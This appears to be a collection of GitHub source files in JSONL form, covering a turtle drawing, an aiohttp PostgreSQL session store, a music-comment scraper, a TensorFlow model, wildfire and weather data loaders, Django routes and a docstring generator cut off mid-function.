+{"seq_id":"888289704","text":"import turtle\nimport math\ndef MG(n,l):\n turtle.left(90 + 180/n)\n for i in range(n):\n turtle.forward(l)\n turtle.left(360/n)\n\ndef rad (n, a):\n r = a / (2 * math.sin(2*math.pi / (2 * n)))\n return r\n\nl = 40\nfor i in range(1, 10, 1):\n MG((i+2), l + 5*i)\n turtle.right(180 / (i+2) + 90)\n turtle.penup()\n turtle.forward(rad(i+3, l + 5*(i+1)) - rad(i+2, l + 5*i))\n turtle.pendown()","repo_name":"Hoodyman1/infa_2021_Shcherbakov","sub_path":"lab1/t9.py","file_name":"t9.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29528708950","text":"import json\nimport uuid\nfrom typing import Any, Callable, Optional\n\nimport psycopg2.extras\nfrom aiohttp import web\nfrom aiopg import Pool\n\nfrom aiohttp_session import AbstractStorage, Session\n\n\nclass PgStorage(AbstractStorage):\n \"\"\"PG storage\"\"\"\n\n def __init__( # type: ignore[no-any-unimported]\n self,\n pg_pool: Pool,\n *,\n cookie_name: str = \"AIOHTTP_SESSION\",\n 
domain: Optional[str] = None,\n        max_age: Optional[int] = None,\n        path: str = \"/\",\n        secure: Optional[bool] = None,\n        httponly: bool = True,\n        key_factory: Callable[[], str] = lambda: uuid.uuid4().hex,\n        encoder: Callable[[object], str] = psycopg2.extras.Json,\n        decoder: Callable[[str], Any] = json.loads,\n    ):\n        super().__init__(\n            cookie_name=cookie_name,\n            domain=domain,\n            max_age=max_age,\n            path=path,\n            secure=secure,\n            httponly=httponly,\n            encoder=encoder,\n            decoder=decoder,\n        )\n        self._pg = pg_pool\n        self._key_factory = key_factory\n\n    async def load_session(self, request: web.Request) -> Session:\n        cookie = self.load_cookie(request)\n        if cookie is None:\n            return Session(None, data={}, new=True, max_age=self.max_age)\n        else:\n            async with self._pg.acquire() as conn:\n                key = uuid.UUID(cookie)\n                async with conn.cursor(\n                    cursor_factory=psycopg2.extras.DictCursor\n                ) as cur:\n\n                    await cur.execute(\n                        \"SELECT session, extract(epoch from created) \"\n                        + \"FROM web.sessions WHERE uuid = %s\",\n                        (key,),\n                    )\n                    data = await cur.fetchone()\n\n                if not data:\n                    return Session(None, data={}, new=True, max_age=self.max_age)\n\n        return Session(key, data=data, new=False, max_age=self.max_age)\n\n    async def save_session(\n        self, request: web.Request, response: web.StreamResponse, session: Session\n    ) -> None:\n        key = session.identity\n        if key is None:\n            key = self._key_factory()\n            self.save_cookie(response, key, max_age=session.max_age)\n        else:\n            if session.empty:\n                self.save_cookie(response, \"\", max_age=session.max_age)\n            else:\n                key = str(key)\n                self.save_cookie(response, key, max_age=session.max_age)\n\n        data = self._get_session_data(session)\n        if not data:\n            return\n\n        data_encoded = self._encoder(data[\"session\"])\n        expire = data[\"created\"] + (session.max_age or 0)\n        async with self._pg.acquire() as conn:\n            async with conn.cursor() as cur:\n                await cur.execute(\n                    \"INSERT INTO web.sessions (uuid,session,created,expire)\"\n                    + \" VALUES (%s, %s, to_timestamp(%s),to_timestamp(%s))\"\n                    + \" ON CONFLICT (uuid)\"\n                    + \" DO UPDATE\"\n                    + \" SET (session,expire)=(EXCLUDED.session, EXCLUDED.expire)\",\n                    [key, data_encoded, data[\"created\"], expire],\n                )\n","repo_name":"aio-libs/aiohttp-session","sub_path":"examples/postgres_storage.py","file_name":"postgres_storage.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":234,"dataset":"github-code","pt":"32"} +{"seq_id":"13053303786","text":"import scrapy\nfrom lxml import etree\nfrom ActualCombat.scrapy_wyy.scrapy_wyy.items import ScrapyWyyItem\nimport copy\nfrom ActualCombat.scrapy_wyy.Test.test_open import get_music\n\nclass WyyBotSpider(scrapy.Spider):\n    name = 'wyy_bot'\n\n    # fill in the playlist url here\n    def start_requests(self):\n        all_music_name, all_musi_id = get_music()\n        for index,value in enumerate(all_musi_id):\n            url = 'http://music.163.com/api/v1/resource/comments/R_SO_4_'+all_musi_id[index]\n            r = scrapy.Request(url=url)\n            r.meta['song_name'] = all_music_name[index]\n            r.meta['song_id'] = all_musi_id[index]\n            yield r\n\n    def parse(self, response):\n        # create an item object\n        item = ScrapyWyyItem()\n        # song id\n        item['song_id'] = response.meta['song_id']\n        # song name\n        item['song_name'] = response.meta['song_name']\n        # process the data\n        response = response.text.split(',')\n        test_toatl_comment = copy.deepcopy(response)\n        for i in test_toatl_comment:\n            if 'total' not in i:\n                response.remove(i)\n        # total comment count for the song\n        item['total_comment'] = response[0].split(':')[1]\n        yield item\n\n    # def parse(self, response):\n    #     # build the etree\n    #     song_etree = 
etree.HTML(response.text)\n    #     # get all songs\n    #     all_song_name = song_etree.xpath('//div[@id=\"song-list-pre-cache\"]/ul/li/a/text()')\n    #     # get the ids of all songs\n    #     all_song_id = song_etree.xpath('//textarea[@id=\"song-list-pre-data\"]/text()')\n    #     # create an item object\n    #     item = ScrapyWyyItem()\n    #     # initial data filtering\n    #     all_song_id = all_song_id[0].split(',')\n    #     # make a deep copy\n    #     test_all_song = copy.deepcopy(all_song_id)\n    #     # filter the data\n    #     for i in test_all_song:\n    #         if 'R_SO' not in i:\n    #             all_song_id.remove(i)\n    #     # filter the info of every song in this playlist\n    #     for index, value in enumerate(all_song_id):\n    #         # process the data\n    #         song_id = value.split('\":\"')[1][:-1]\n    #         # song id\n    #         item['song_id'] = song_id\n    #         # song name\n    #         item['song_name'] = all_song_name[index]\n    #         # corresponding url\n    #         url = 'http://music.163.com/api/v1/resource/comments/'+song_id\n    #         yield scrapy.Request(url=url, meta=item, callback=self.parse_comment)\n\n    # def parse_comment(self, response):\n    #     # create an item object\n    #     item = ScrapyWyyItem()\n    #     # song id\n    #     item['song_id'] = response.meta['song_id']\n    #     # song name\n    #     item['song_name'] = response.meta['song_name']\n    #     # process the data\n    #     response = response.text.split(',')\n    #     test_toatl_comment = copy.deepcopy(response)\n    #     for i in test_toatl_comment:\n    #         if 'total' not in i:\n    #             response.remove(i)\n    #     # total comment count for the song\n    #     item['total_comment'] = response[0].split(':')[1]\n    #     yield item\n    #\n","repo_name":"isgaokai/PythonBot","sub_path":"ActualCombat/scrapy_wyy/scrapy_wyy/spiders/wyy_bot.py","file_name":"wyy_bot.py","file_ext":"py","file_size_in_byte":3091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8615427779","text":"import tensorflow as tf\nfrom functools import reduce\nfrom operator import mul\n\n\nclass MultiModal(object):\n    def __init__(self):\n        self.image = tf.placeholder(tf.float32, [None, 88, 88, 3], name='image')\n        self.visit = tf.placeholder(tf.float32, [None, 7, 26, 24], name='visit')\n\n        with tf.name_scope(\"label\"):\n            self.label = tf.placeholder(tf.int32, [None], name='label')\n            self.one_hot = tf.one_hot(indices=self.label, depth=9, name='one_hot')\n\n        self.global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n        self.training = tf.placeholder(tf.bool)\n\n        self.output_image = self.image_network(self.image)\n        print(self.output_image)\n        self.output_visit = self.visit_network(self.visit)\n        print(self.output_visit)\n        self.output = tf.concat([self.output_image, self.output_visit], axis=1)\n        self.prediction = tf.layers.dense(self.output, units=9)\n\n        self.loss = self.get_loss(self.prediction, self.one_hot)\n\n        self.batch_size = 512\n        with tf.name_scope('correct_prediction'):\n            correct_prediction = tf.equal(tf.argmax(self.prediction, 1), tf.argmax(self.one_hot, 1))\n        with tf.name_scope('accuracy'):\n            self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n            tf.summary.scalar('train_accuracy_concat', self.accuracy)\n\n        update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n        with tf.control_dependencies(update_ops):\n            self.optimizer = tf.train.AdamOptimizer(1e-3).minimize(self.loss, global_step=self.global_step)\n\n        self.merged = tf.summary.merge_all()\n        print(\"Network initialized successfully\")\n\n    def conv2d(self, x, input_filters, output_filters, kernel, strides=1, padding=\"SAME\"):\n        with tf.name_scope('conv'):\n            shape = [kernel, kernel, input_filters, output_filters]\n            weight = tf.Variable(tf.truncated_normal(shape, stddev=0.1), name='weight')\n            return tf.nn.conv2d(x, weight, strides=[1, strides, strides, 1], padding=padding, name='conv')\n\n    def residual(self, x, num_filters, strides, 
with_shortcut=False):\n with tf.name_scope('residual'):\n conv1 = self.conv2d(x, num_filters[0], num_filters[1], kernel=1, strides=strides)\n bn1 = tf.layers.batch_normalization(conv1, axis=3, training=self.training)\n relu1 = tf.nn.relu(bn1)\n conv2 = self.conv2d(relu1, num_filters[1], num_filters[2], kernel=3)\n bn2 = tf.layers.batch_normalization(conv2, axis=3, training=self.training)\n relu2 = tf.nn.relu(bn2)\n conv3 = self.conv2d(relu2, num_filters[2], num_filters[3], kernel=1)\n bn3 = tf.layers.batch_normalization(conv3, axis=3, training=self.training)\n if with_shortcut:\n shortcut = self.conv2d(x, num_filters[0], num_filters[3], kernel=1, strides=strides)\n bn_shortcut = tf.layers.batch_normalization(shortcut, axis=3, training=self.training)\n residual = tf.nn.relu(bn_shortcut+bn3)\n else:\n residual = tf.nn.relu(x+bn3)\n return residual\n\n def image_network(self, image):\n channel = 16\n with tf.name_scope(\"Resnet-image\"):\n with tf.name_scope('stage1'):\n conv = self.conv2d(image, 3, channel, 7, 1)\n bn = tf.layers.batch_normalization(conv, axis=3, training=self.training)\n relu = tf.nn.relu(bn)\n with tf.name_scope('stage2'):\n pool = tf.nn.max_pool(relu, [1, 3, 3, 1], [1, 2, 2, 1], padding=\"SAME\")\n res = self.residual(pool, [channel, channel//2, channel//2, channel*2], 1, with_shortcut=True)\n with tf.name_scope('stage3'):\n res = self.residual(res, [channel*2, channel, channel, channel*4], 2, with_shortcut=True)\n with tf.name_scope('stage4'):\n res = self.residual(res, [channel*4, channel*2, channel*2, channel*8], 2, with_shortcut=True)\n with tf.name_scope('stage5'):\n res = self.residual(res, [channel*8, channel*4, channel*4, channel*16], 2, with_shortcut=True)\n pool = tf.nn.avg_pool(res, [1, 6, 6, 1], strides=[1, 1, 1, 1], padding='VALID')\n with tf.name_scope('fc'):\n flatten = tf.layers.flatten(pool)\n return flatten\n\n def visit_network(self, image):\n channel = 32\n with tf.name_scope(\"Resnet-visit\"):\n with tf.name_scope('stage1'):\n conv = self.conv2d(image, 24, channel, 7, 1)\n bn = tf.layers.batch_normalization(conv, axis=3, training=self.training)\n relu = tf.nn.relu(bn)\n with tf.name_scope('stage2'):\n res = self.residual(relu, [channel, channel//2, channel//2, channel*2], 1, with_shortcut=True)\n with tf.name_scope('stage3'):\n res = self.residual(res, [channel*2, channel, channel, channel*4], 2, with_shortcut=True)\n with tf.name_scope('stage4'):\n res = self.residual(res, [channel*4, channel*2, channel*2, channel*8], 2, with_shortcut=True)\n with tf.name_scope('stage5'):\n res = self.residual(res, [channel*8, channel*4, channel*4, channel*16], 2, with_shortcut=True)\n pool = tf.nn.avg_pool(res, [1, 1, 4, 1], strides=[1, 1, 1, 1], padding='VALID')\n with tf.name_scope('fc'):\n flatten = tf.layers.flatten(pool)\n return flatten\n\n def get_loss(self, output_concat, onehot):\n with tf.name_scope(\"loss\"):\n losses = tf.nn.softmax_cross_entropy_with_logits(logits=output_concat, labels=onehot)\n loss = tf.reduce_mean(losses)\n tf.summary.scalar('loss-concat', loss)\n return loss\n\n def get_num_params(self):\n num_params = 0\n for variable in tf.trainable_variables():\n print(variable)\n shape = variable.get_shape()\n num_params += reduce(mul, [dim.value for dim in shape], 1)\n return num_params\n\n\nif __name__ == '__main__':\n model = MultiModal()\n 
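# report the total number of trainable parameters across the image and visit branches\n    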
print(model.get_num_params())\n","repo_name":"czczup/UrbanRegionFunctionClassification","sub_path":"code/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6188,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"32"} +{"seq_id":"16109783829","text":"import streamlit as st\nimport pandas as pd\nimport glob\nimport json\n\nimport sqlite3\nfrom google.oauth2 import service_account\nfrom google.cloud import bigquery\n\n\n@st.cache_resource\ndef connect_gcp():\n    credentials = service_account.Credentials.from_service_account_info(\n        st.secrets[\"gcp_service_account\"]\n    )\n    client = bigquery.Client(credentials=credentials)\n\n    return client\n\n# load wildfire data from sqlite\n@st.cache_data\ndef load_wildfire_data_local_db(filename='dataset/FPA_FOD_20170508.sqlite'):\n    cnx = sqlite3.connect(filename)\n\n    df = pd.read_sql_query(\"SELECT fire_year as year, discovery_date as date, state, stat_cause_code, stat_cause_descr as stat_cause, latitude, longitude, fire_size, fire_size_class FROM 'Fires' ORDER BY fire_year, discovery_date\", cnx)\n    df['date'] = pd.to_datetime(df['date'] - pd.Timestamp(0).to_julian_date(), unit='D')\n    df['incident'] = 1\n    df.columns = df.columns.str.lower()\n\n    return df\n\n\n# load wildfire data from csv file\n@st.cache_data\ndef load_wildfire_data_local_csv(filename='dataset/wildfire_data.csv'):\n    df = pd.read_csv(filename)\n    df['incident'] = 1\n    df['datetime'] = pd.to_datetime(df['date'])\n    df['date'] = pd.to_datetime(df['datetime'].dt.date)\n\n    return df\n\n\n# load wildfire data from google cloud big query\n@st.cache_data\ndef load_wildfire_data_gcp(_client):\n    query_job = _client.query(\"SELECT * FROM `vernal-shine-239106.US_Wildfire_Dataset.wildfire`\")\n    df = (query_job.result().to_dataframe())\n    \n    df['incident'] = 1\n    df['datetime'] = df['date']\n    df['date'] = pd.to_datetime(df['date'].dt.date)\n\n    return df\n\n\n# load weather data from visual crossing json files (api export)\n@st.cache_data\ndef load_weather_data_local_json(filename='dataset/weather_vcross/weather_hist_*_*.json'):\n    json_files = sorted(glob.glob(filename))\n\n    df = None\n    for json_file in json_files:\n        with open(json_file,'r') as f:\n            weather_dict = json.loads(f.read())\n        state = json_file.split('_')[2]\n\n        if df is None:\n            df = pd.json_normalize(weather_dict, record_path=['days'])\n            df['region'] = state\n        else:\n            tmp_df = pd.json_normalize(weather_dict, record_path=['days'])\n            tmp_df['region'] = state\n            df = pd.concat([df, tmp_df])\n            del tmp_df\n\n    df.rename(columns={'datetime': 'date'}, inplace=True)\n    df['date'] = pd.to_datetime(df['date'])\n\n    return df\n\n\n# load weather data csv from noaa (gcp export)\n@st.cache_data\ndef load_weather_data_local_csv(filename='dataset/weather_noaa/weather_data_noaa_*.csv'):\n    csv_files = sorted(glob.glob(filename))\n\n    df_list = []\n    for file in csv_files:\n        df = pd.read_csv(file, index_col=None, header=0)\n        df_list.append(df)\n\n    df = pd.concat(df_list, ignore_index=True)\n    df.rename(columns={'state': 'region'}, inplace=True)\n    df['date'] = pd.to_datetime(df['date'])\n    \n    return df\n\n\n# load weather data direct from gcp bigquery noaa dataset\n@st.cache_data\ndef load_weather_data_gcp(_client, from_year=1992, to_year=2015):\n    query_stmt = \"SELECT CONCAT(year,'-',mo,'-',da) as date, \\\n                    country, state as region, AVG(s.lat) lat, AVG(s.lon) lon, COUNT(*) count, \\\n                    AVG(IF (temp=9999.9, null, temp)) as temp, \\\n                    AVG(IF (dewp=9999.9, null, dewp)) as dew_point, \\\n                    AVG(IF (slp=9999.9, null, slp)) as 
sea_level_pressure, \\\n AVG(IF (stp=9999.9, null, stp)) as station_pressure, \\\n AVG(IF (visib=999.9, null, visib)) as visibility, \\\n AVG(IF (wdsp='999.9', null, CAST(wdsp AS FLOAT64))) as wind_speed, \\\n MAX(IF (mxpsd='999.9', null, CAST(mxpsd AS FLOAT64))) as max_sustained_wind, \\\n MAX(IF (gust=999.9, null, gust)) as max_wind_gust, \\\n MAX(IF (max=9999.9, null, max)) as max_temp, \\\n MIN(IF (min=9999.9, null, min)) as min_temp, \\\n AVG(IF (prcp=99.9, null, prcp)) as precipitation, \\\n AVG(IF (sndp=999.9, null, sndp)) as snow_depth, \\\n MAX(CAST(fog AS INT64)) as fog, \\\n MAX(CAST(rain_drizzle AS INT64)) as rain_drizzle, \\\n MAX(CAST(snow_ice_pellets AS INT64)) as snow_ice_pellets, \\\n MAX(CAST(hail AS INT64)) as hail, \\\n MAX(CAST(thunder AS INT64)) as thunder, \\\n MAX(CAST(tornado_funnel_cloud AS INT64)) as tornado_funnel_cloud \\\n FROM `bigquery-public-data.noaa_gsod.gsod*` w \\\n JOIN `bigquery-public-data.noaa_gsod.stations` s \\\n ON w.stn = s.usaf AND w.wban = s.wban \\\n AND _TABLE_SUFFIX BETWEEN '{}' AND '{}' \\\n AND s.country = 'US' AND state IS NOT NULL \\\n GROUP BY _TABLE_SUFFIX, date, country, state \\\n ORDER BY date, country, state\".format(from_year, to_year)\n\n query_job = _client.query(query_stmt)\n df = (query_job.result().to_dataframe())\n df['date'] = pd.to_datetime(df['date'])\n\n return df\n\n\n# precompute values (lists, ranges) to be used in forms\n@st.cache_data\ndef get_wildfire_lists(df):\n list_fire_size_classes = df['fire_size_class'].sort_values().unique()\n list_states = df['region'].sort_values().unique()\n list_years = df['date'].dt.year.sort_values().astype(str).unique()\n list_causes = df['stat_cause'].sort_values().unique()\n\n return list_fire_size_classes, list_states, list_years, list_causes\n\n\n@st.cache_data\ndef get_wildfire_ranges(df):\n max_fire_size = int(max(df['fire_size'])) + 1\n min_date = min(df['date'])\n max_date = max(df['date'])\n\n return max_fire_size, min_date, max_date\n\n\n@st.cache_data\ndef get_wildfire_size_class_range(max_fire_size):\n # fire size class range based on the values given by the dataset owners\n fire_size_class_range = {\n 'A': (0, 1),\n 'B': (0, 10),\n 'C': (10, 100),\n 'D': (100, 300),\n 'E': (300, 1000),\n 'F': (1000, 5000),\n 'G': (5000, max_fire_size)\n }\n return fire_size_class_range\n\n\n@st.cache_data\ndef get_weather_lists(df):\n list_states = df['region'].sort_values().unique()\n\n return list_states\n\n\ndef load_descriptions(filename):\n with open(filename,'r') as f:\n dict = json.loads(f.read())\n\n return dict\n\n\n@st.cache_data\ndef load_descriptions_shared(filename='input/descr_shared_data.json'):\n return load_descriptions(filename)\n\n\n@st.cache_data\ndef load_descriptions_wildfire(filename='input/descr_wildfire_data.json'):\n return load_descriptions(filename)\n\n\n@st.cache_data\ndef load_descriptions_weather(filename='input/descr_weather_data.json'):\n return load_descriptions(filename)","repo_name":"abigaile-d/wildfire-prediction","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32553557457","text":"from collections import Counter\n\nimport numpy as np\n\n\ndef read_input():\n return np.array([int(x) for x in next(open(\"data/day6.txt\", \"r\")).split(\",\")])\n\n\n# https://dev.to/qviper/advent-of-code-python-solution-day-6-22hl\ndef part_two(fishes_state, days=80):\n count = Counter(fishes_state)\n for _ in 
range(days):\n        # -- Slide each count down one timer key; a missing key defaults to 0\n        count = {l: (0 if count.get(l + 1) is None else count.get(l + 1)) for l in range(-1, 8)}\n\n        # -- Add newborn fish\n        count[8] = count[-1]\n\n        # -- Reset fish that just gave birth\n        count[6] += count[-1]\n\n        # -- Reset exhausted lives\n        count[-1] = 0\n    print(sum(count.values()))\n\n\ndef part_one(fishes_state, i=0, days=80):\n    if i == days:\n        return print(len(fishes_state))\n\n    # -- First mask the zeros\n    ready_to_give_birth_mask = fishes_state == 0\n\n    # --- Replace 0 by 6\n    fishes_state[ready_to_give_birth_mask] = 6\n\n    # -- Decrease other than old zero (new 6)\n    fishes_state[~ready_to_give_birth_mask] -= 1\n\n    # -- Create new array of size = original + newborns\n    fishes_state_ = np.ones(len(fishes_state) + ready_to_give_birth_mask.sum()) * 8\n\n    # -- Replace with the value of the old array\n    fishes_state_[:fishes_state.size] = fishes_state\n    fishes_state = fishes_state_\n\n    # -- Recursive call\n    part_one(fishes_state, i + 1, days)\n\n\nif __name__ == \"__main__\":\n    part_one(read_input(), 0, 80)\n    part_two(read_input(), 256)\n","repo_name":"nicolasfeyer/adventofcode-2021","sub_path":"day6/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11039983870","text":"from django.conf.urls import url\n\nfrom views import tagViews\n\nurlpatterns = [\n    url(r'^tag', tagViews.tag, name='tag'),\n    url(r'^tag/$', tagViews.tag, name='tag'),\n    url(r'^tag/?(\\S)$', tagViews.tag, name='tag'),\n    url(r'^newTag/$', tagViews.new_tag, name='newTag'),\n    url(r'^newTag/?(\\S)$', tagViews.new_tag, name='newTag'),\n    url(r'^detailTag/?(\\S)$', tagViews.detail_tag, name='detailTag'),\n    url(r'^detailTag/(?P[0-9a-f-]+)$', tagViews.detail_tag, name='detailTag'),\n    url(r'^detailTag/(?P[0-9a-f-]+)/?(\\S)$', tagViews.detail_tag, name='detailTag'),\n    url(r'^editTag/(?P[0-9a-f-]+)$', tagViews.edit_tag, name='editTag'),\n    url(r'^deleteTag/(?P[0-9a-f-]+)$', tagViews.delete_tag, name='deleteTag'),\n]\n","repo_name":"alexandrepasc/TestTcms","sub_path":"urls/tagUrl.py","file_name":"tagUrl.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17026032797","text":"import os, sys\r\nfrom general_set_up_functions import rasterio_basic_functions as rb\r\nfrom general_set_up_functions import general_functions as gf\r\nfrom pathlib import Path\r\n\r\n\r\nclass gacos_set_up():\r\n    def __init__(self, asc_name, dsc_name):\r\n        self.base_path = Path.cwd().absolute().parent\r\n        self.base_path_asc = self.base_path / asc_name\r\n        self.base_path_dsc = self.base_path / dsc_name\r\n        self.parameter_file_asc = self.base_path_asc / 'Main/Time_Series/platform_parameters.json'\r\n        self.parameter_file_dsc = self.base_path_dsc / 'Main/Time_Series/platform_parameters.json'\r\n        self.path_2_asc_ztd = self.base_path / 'MSBASv3_Timeseries/asc_ztd'\r\n        self.path_2_dsc_ztd = self.base_path / 'MSBASv3_Timeseries/dsc_ztd'\r\n        self.asc_file_download_name = self.path_2_asc_ztd / 'asc_downloads.txt'\r\n        self.dsc_file_download_name = self.path_2_dsc_ztd / 'dsc_downloads.txt'\r\n        self.processed_dirs_asc = [Path(str(x)) for x in\r\n                                   self.base_path_asc.glob('Main/Processed_Data/20*20*/*displacement_VV_rcut_mcoh.tif')]\r\n        self.processed_dirs_asc.sort()\r\n        self.processed_dirs_dsc = [Path(str(x)) for x in\r\n                                   
self.base_path_dsc.glob('Main/Processed_Data/20*20*/*displacement_VV_rcut_mcoh.tif')]\r\n self.processed_dirs_dsc.sort()\r\n self.base_file_asc = self.processed_dirs_asc[0]\r\n self.base_file_dsc = self.processed_dirs_dsc[0]\r\n self.left_asc, self.bottom_asc, self.right_asc, self.top_asc = None, None, None, None\r\n self.left_dsc, self.bottom_dsc, self.right_dsc, self.top_dsc = None, None, None, None\r\n self.time_of_day_asc, self.time_of_day_dsc = None, None\r\n self.asc_dates_list, self.dsc_dates_list = None, None\r\n\r\n def make_dirs(self):\r\n if not self.path_2_asc_ztd.exists():\r\n os.mkdir(self.path_2_asc_ztd)\r\n if not self.path_2_dsc_ztd.exists():\r\n os.mkdir(self.path_2_dsc_ztd)\r\n\r\n def bounds_return(self):\r\n self.left_asc, self.bottom_asc, self.right_asc, self.top_asc = rb.tif_bounds_ztd(self.base_file_asc)\r\n self.left_dsc, self.bottom_dsc, self.right_dsc, self.top_dsc = rb.tif_bounds_ztd(self.base_file_dsc)\r\n\r\n def time_of_day_return(self):\r\n time_of_day_asc, time_of_day_dsc = (gf.open_json_file(self.parameter_file_asc)['startTime'],\r\n gf.open_json_file(self.parameter_file_dsc)['startTime'])\r\n self.time_of_day_asc, self.time_of_day_dsc = (gf.HHMMSS_2_HHMM(time_of_day_asc),\r\n gf.HHMMSS_2_HHMM(time_of_day_dsc))\r\n\r\n def dates_return(self):\r\n self.asc_dates_list, self.dsc_dates_list = (gf.unique_dates(self.processed_dirs_asc),\r\n gf.unique_dates(self.processed_dirs_dsc))\r\n\r\n def write_files(self):\r\n asc_list = [[self.left_asc, self.bottom_asc, self.right_asc, self.top_asc],\r\n [self.time_of_day_asc],\r\n self.asc_dates_list\r\n ]\r\n dsc_list = [[self.left_dsc, self.bottom_dsc, self.right_dsc, self.top_dsc],\r\n [self.time_of_day_dsc],\r\n self.dsc_dates_list]\r\n gf.write_txt_file_gacos(self.asc_file_download_name, asc_list)\r\n gf.write_txt_file_gacos(self.dsc_file_download_name, dsc_list)\r\n\r\n def run_all(self):\r\n self.make_dirs()\r\n self.bounds_return()\r\n self.time_of_day_return()\r\n self.dates_return()\r\n self.write_files()\r\n\r\nif __name__ == '__main__':\r\n sys_index_var_1 = sys.argv[1]\r\n sys_index_var_2 = sys.argv[2]\r\n run_gacos_set_up = gacos_set_up(sys_index_var_1, sys_index_var_2)\r\n run_gacos_set_up.run_all()\r\n\r\n\r\n\r\n","repo_name":"ClayDWoods/Sentinel-1A-B_Processing_Codes","sub_path":"MSBASv3_Timeseries/Main/gacos_setup.py","file_name":"gacos_setup.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"10589312190","text":"\"\"\"\nThe goal of this file is to auto document\na python file.\nIt looks for every function; Considers the\ninputs. 
If the inputs to the function are\nall in the varspec.json sheet, then it\nsimply adds the classic documentation.\nIf the inputs aren't, then it raises\nan error and states which input\nwasn't included.\nIt also looks for a custom return string\nright above each function definition.\nThis string looks like '# rets X Y ',\nwhere X and Y would be variable names.\nNormally this should only return one\nthing.\nIf there is already a docstring under\nthe function, then it appends the new documentation\nabove it, within the triple quotation - \nHowever, there must be a way to symbolize\nthat the documentation has already been\nadded and to not duplicate it every time\nthe program is run.\n\"\"\"\n\nimport os\nimport re\nimport logging\nimport json\nimport sys\nimport copy\nfrom validate_types import import_all_types\n\n\n\n\n# rets funcN2vars\ndef get_func_name_to_vars_from_file(python_file_fp):\n func_name_to_locs = get_function_names_starts_and_ends(python_file_fp)\n #print(function_names_to_starts_and_ends)\n funcN2vars = get_func_name_to_variables(func_name_to_locs, \n python_file_fp)\n return funcN2vars\n\n# rets funcN2vars2docstr\ndef create_documentation_args_returns_str(funcN2vars,\n type_spec_d,\n types_cfg_json_fp):\n\n funcN2vars2docstr_l = {}\n for func_name, argsNret_d in funcN2vars.items():\n exchange_d = {}\n for x in [\"Args\", \"Returns\"]:\n func_vars = argsNret_d[x]\n var2docstr_l = {}\n for var in func_vars:\n if var not in type_spec_d:\n raise Exception(f\"Variable {var} from function {func_name}, \" + \\\n f\"group {x}, not in type_spec_d from \" + \\\n f\"file {types_cfg_json_fp}\")\n spec_d = type_spec_d[var]\n if \"subtype\" not in spec_d:\n raise Exception(f\"Variable {var} from function {func_name} \" + \\\n f\" does not have key 'subtype'.\")\n if \"desc\" not in spec_d:\n raise Exception(f\"Variable {var} from function {func_name} \" + \\\n f\" does not have key 'desc'.\")\n docstrs_l = prepare_docstrs_l(var, type_spec_d, 1)\n var2docstr_l[var] = docstrs_l\n exchange_d[x] = var2docstr_l\n\n funcN2vars2docstr_l[func_name] = exchange_d \n return funcN2vars2docstr_l \n\n\n\n\n\n# rets crt_var_list \ndef prepare_docstrs_l(var, type_spec_d, current_num_layer, \n max_num_layers=4, dict_key=None):\n \"\"\"\n Description:\n This recursive function returns either a string or a list,\n depending on the layer number\n # Note, if max_num_layers = -1, then there is no limit to layers.\n If dict_key is not None, then this is a part of a dict\n \"\"\"\n logging.debug(f\"Preparing docstrings list for variable {var}. 
Layer: {current_num_layer}.\")\n\n # \"\" represents don't print another doc string\n if max_num_layers != -1 and current_num_layer >= max_num_layers:\n return \"\"\n #if var in [\"string\", \"int\", \"float\", \"skip\", \"bool\", \"None\"]:\n # return \"\"\n\n if var not in type_spec_d:\n raise Exception(f\"var {var} missing from type_spec_d\")\n crt_spec_d = type_spec_d[var]\n \n st = crt_spec_d[\"subtype\"]\n if dict_key is not None:\n this_var_doc_str = f\"{dict_key} -> {var} ({st}), {crt_spec_d['desc']}\"\n else:\n this_var_doc_str = f\"{var} ({st}): {crt_spec_d['desc']}\"\n crt_var_list = [this_var_doc_str]\n \n if st in [\"string\", \"int\", \"float\", \"skip\", \"bool\"]:\n if \"restrictions\" in crt_spec_d:\n r_d = crt_spec_d[\"restrictions\"]\n layer_2 = []\n for k, v in r_d.items():\n layer_2.append(f\"Restriction: {k}={v}\")\n crt_var_list.append(layer_2)\n return crt_var_list\n elif st == \"dict\":\n layer_2 = []\n if \"dict_keys\" in crt_spec_d:\n for k, v in crt_spec_d[\"dict_keys\"].items():\n if not check_var_against_type_spec_d(v, type_spec_d):\n raise Exception(f\"Dict keys value {v} not in type_spec_d.\")\n if \"list\" not in v:\n layer_2.append(prepare_docstrs_l(v, type_spec_d, current_num_layer + 1, dict_key=k))\n else:\n list_subtype = (v.split(\"<\")[1]).split(\">\")[0]\n layer_2.append(prepare_docstrs_l(list_subtype, type_spec_d, current_num_layer + 1, dict_key=k))\n\n elif \"dict_spec\" in crt_spec_d:\n k = list(crt_spec_d[\"dict_spec\"].keys())[0]\n v = crt_spec_d[\"dict_spec\"][k]\n if not check_var_against_type_spec_d(k, type_spec_d):\n raise Exception(f\"Dict spec key {k} not in type_spec_d.\")\n if not check_var_against_type_spec_d(v, type_spec_d):\n raise Exception(f\"Dict spec value {v} not in type_spec_d.\")\n layer_2.append(f\"{k} -> {v}\")\n layer_2.append(prepare_docstrs_l(k, type_spec_d, current_num_layer+1))\n if \"list\" not in v:\n layer_2.append(prepare_docstrs_l(v, type_spec_d, current_num_layer + 1))\n else:\n list_subtype = (v.split(\"<\")[1]).split(\">\")[0]\n layer_2.append(prepare_docstrs_l(list_subtype, 